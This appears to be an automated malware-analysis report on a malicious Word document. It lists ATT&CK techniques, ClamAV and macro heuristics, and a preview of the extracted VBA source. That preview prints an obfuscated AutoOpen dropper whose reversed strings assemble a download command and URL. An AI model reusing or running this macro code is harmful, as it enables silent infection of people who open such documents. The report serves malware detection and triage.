Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros. The AutoOpen macro is present and uses the Shell() function, indicating an attempt to execute arbitrary code. The ClamAV detection name 'Img.Dropper.PhishingLure' suggests a phishing lure, likely delivered as an attachment. The specific payload or destination is not directly discernible from the provided evidence.
Heuristics (7)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25600 bytes |

SHA-256: 9b871b558d7f8187fb39c260e4953580404de23ced107a1fa760a53e1f060170
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "mabSnkk"
Sub AutoOpen()
On Error Resume Next
OjnsKOAtK = WcjiRJXmw - ckGcDMwUCpL / (8343996 + sLYSvOM - 9926050 + AJWaqEczhO)
qhwiZLozP = rUFfanWtrbX - cIjwFdVurEIw / (126739 + whwHGQwUcj - 822728 + zDhiGFqEEnucF)
LcVnnMIiG = pvkUGpIjCsOdR - JzCFwPIm / (4213703 + voajoUv - 2336266 + MrnWlkOwHrjrh)
Application.Run "nnwXRRAbSG", SYjKGTzrUbRWM
KIiqJDiri = ZiYSPcs - zCkFVVbRVhTB / (8954472 + KOdSCwLsdCio - 2736116 + MRzUPJmowFnJO)
rhAXhInYJ = wZtXFYiajHoFD - zllzVSYitjTK / (5508378 + zjaOCcCuVmh - 3051630 + fHBamdSYv)
End Sub
Function SYjKGTzrUbRWM()
On Error Resume Next
MiVCB = XKEQLAKLHsiBi - cnQotJqdSiFNqj / (184011 + CwbWiXZBs - 1889069 + znizEGkmVCq)
jaiZlaDB = bBusVKzJd - upjaHUFO / (2816692 + jjrpnlBGFtfLMf - 9970921 + jiDruzzpso)
GhEwHZUq = dzPhGnuiu - EEkIrEki / (6836638 + BamlaLXBjhC - 9325092 + UYHpMZXSwFLiZS)
kQXNCdiwfoR = cFljPJSiMl + Mid(StrReverse("vuEACYCnWhALpeR.fbq+fbq)fbq+fbq93]RaHc[]gNiRTS[,fbq+fbq)111fbq+fbq]RaHc[+aEM"), 4, 62)
FnAGwQk = szNHIGQkk - YEMKFVaGB / (8772395 + wnSrnmFUtLFfH - 4892937 + rEWTBwThqGzAJi)
PiVFcVzbNJz = YFAbuLuQVTKPq - SZElHdV / (6922067 + rqfFblpmvmGm - 56482 + jflwoAAridf)
dGudUWi = jsPBERoYJk - FTffhPdjP / (3499554 + YGWjhjjAICaDEz - 4374873 + ipwcVvPjdJVTbF)
GtwDLOvzjza = DvOLJLPDNiGu + Mid(StrReverse("sIqaTkRIYRQfoEBTEfhbq+fbq4N+cQbzm"), 5, 10)
cWFivojOGl = aiKVuuRqa - qpDXNMYCILz / (3660950 + NOKFtkMTCCN - 6678856 + JGKzzPLrSqUM)
wPMMfObbGd = ijZESSHFwHkoY - NJonppb / (703538 + sINhHlvXp - 8559426 + Fdtzjub)
wupEf = MzZKZKwhdDfX - bRjwFlzUA / (6856674 + wWAjPqDuNuqTSz - 7638375 + JDSUKVliLM)
tZNGkW = PGlUIfXkFrIcNi + Mid(StrReverse("bcsbq+'+'fbqc4Nohc4fbq+fbqN+c4'+'NXc4N+c4NnohX(c4N+c4N&McH+McH = dfbq+fbqsc4N+McH+McHc4Nadasnc4N+McH+McHc4NGfc4N+c4Nlc4N( McH(bDPbDHKScsqnasJ"), 16, 123)
hqHIlzinzYl = DJOSnzkJW - wOwROqRiPkbl / (4201877 + CpZlmiiDnj - 6972408 + vliUaLOuN)
WpBwG = DMukudAvmSoqPw - wWoFubOhBvj / (729641 + JQWbKElMqCnADs - 9382987 + ZEVjuboao)
ppvbiUK = XoftpOZFl - vMfKMNIUAE / (8423452 + RPcqKXAibvnr - 6390226 + jzMZazGZWMZKUj)
qpNGvd = iJbMMPf + Mid(StrReverse("SXDGzDjzXjBaPaqN+c4Nz.c4N+c4Noc.kcMcH+McH4N+c4Ncahsc4N+c4NehtmoMcH+McHrfzyc4N+c4Nob/c4McH+McHN+c4N'+'/:ptthc4N+c4N?/c4N+c4NAQIjc4fbq+fbqN+c4Nf'+'bq+fbqG/c4N+c4Nmocc4N+c4N.c4N+c4NnzIHsahlv"), 9, 164)
fCbGKVi = CFCvzYo - PhLIbducrsP / (3332831 + DTPHVERtaQfNVY - 8391788 + iWnkhEz)
QwPWH = LzFjLiYB - EzmnoiUWkoRf / (8990310 + FCYNVbj - 3479343 + THvWwkhvrifQYF)
lpHTSzZF = qrTOwPicR - zdnRCZBmBSjsI / (4233746 + DtZAPpjzIXiI - 3527197 + iliidzHudp)
mwqEav = UajaoWQRz + Mid(StrReverse("XDonitrcKQN+c4N ,fbq+fbq)(c4N+c4N9c4N+c4NTc4N+McH+McHc4NZgNs3Eis3Erc4N+fbq+fbqcMcH+McH4Nfbq+fbqtS'+'oT9TZ.cfsaGc4N+cfbq+fbq4Nfc4NMcH+fbq+fbqMcH+c4Nfbq+'+'fbqlc4N+cs"), 2, 153)
hHFHJlcUOC = btWJcBDSjfuYRj - ThCOfWfJP / (6836320 + lLJKYZuLqbLbCc - 4893035 + bOjRnuMEFhi)
BHnssvN = awkGZfQ - JVGUdFspHFzmG / (8204807 + ufSIqwF - 950145 + rrltqECWLhXFH)
iJKWr = nhCXzAhwz - sqbHXatDQQcm / (3931426 + wCDdaYTwmQibob - 1543323 + IutBBAd)
famiviE = iiXmjzj + Mid(StrReverse("vXMqbJIuuRzHHatLOk + cilbupfbq+f'+'bq:vc4N+c4NneGfl = c4McH+McHN+c4Nfbq+fbqCDc4N+c4NSc4N+cfbq+fb'+'q4NGfl;'+'c4N+c4Nfbq+fbq)ohX?ohX(tc4N+c4NilpS.oc4N+c4NhX/kMcH+McHc4N+c4NJ3c4N+c4NwEec4N+c4N/mocc4NOURUYciiSdNDkcKqGSEbD"), 22, 179)
Itzvwib = YQuELdvmSv - HisSzwYI / (5823144 + lAJudcOkCNHEY - 4078906 + HwSRDzVXdjEJ)
FzcQCfoAdmE = GaVoajnPlJhAhB - iEDJXjpBG / (8373269 + qPcjKZTTdcr - 3513987 + shVWnkQVzFo)
iSnXBdsp = jvlNQYPzzq - nEwIhOYmrm / (4778381 + pKTOVbEtJ - 7675319 + iihFNEcV)
XZhWlNCtV = zlnTprmBNDYuzE + Mid(StrReverse("cjUikzF( ()McHXMcfbq+'+'fbqH+]31[D'+'ILleHSmCdYO"), 6, 36)
FqGcojDXZjX = HiwCwJtVuwNz - UizILiORtOicCa / (8713928 + zUqqWWzlCQuiz - 7069096 + wjUUwiz)
YAncEGjVMjt = kiTOPRauj - dzcWJaw / (5879706 + FvojSIJhs
' ... (truncated)
```